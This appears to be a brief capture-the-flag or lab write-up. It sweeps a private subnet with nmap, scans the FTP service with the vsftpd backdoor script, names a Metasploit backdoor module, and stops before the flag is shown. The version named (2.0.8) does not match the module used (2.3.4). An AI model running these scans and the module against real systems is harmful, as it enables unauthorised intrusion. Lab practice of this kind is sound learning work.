• choosing my target:

  ❯ nmap -sn 10.150.150.10-254
  

• network mapping and target scanning:
• My target isn’t running alot of services but the one of more value is the FTP port.
• so i searched for possible exploit for the FTP version (vsftpd 2.0.8) and found this:

❯ nmap --script ftp-vsftpd-backdoor -p 21 10.150.150.12

• then use metasploit to exploit the target using the module:

  exploit/unix/ftp/vsftpd_234_backdoor
  

• and here is the flag: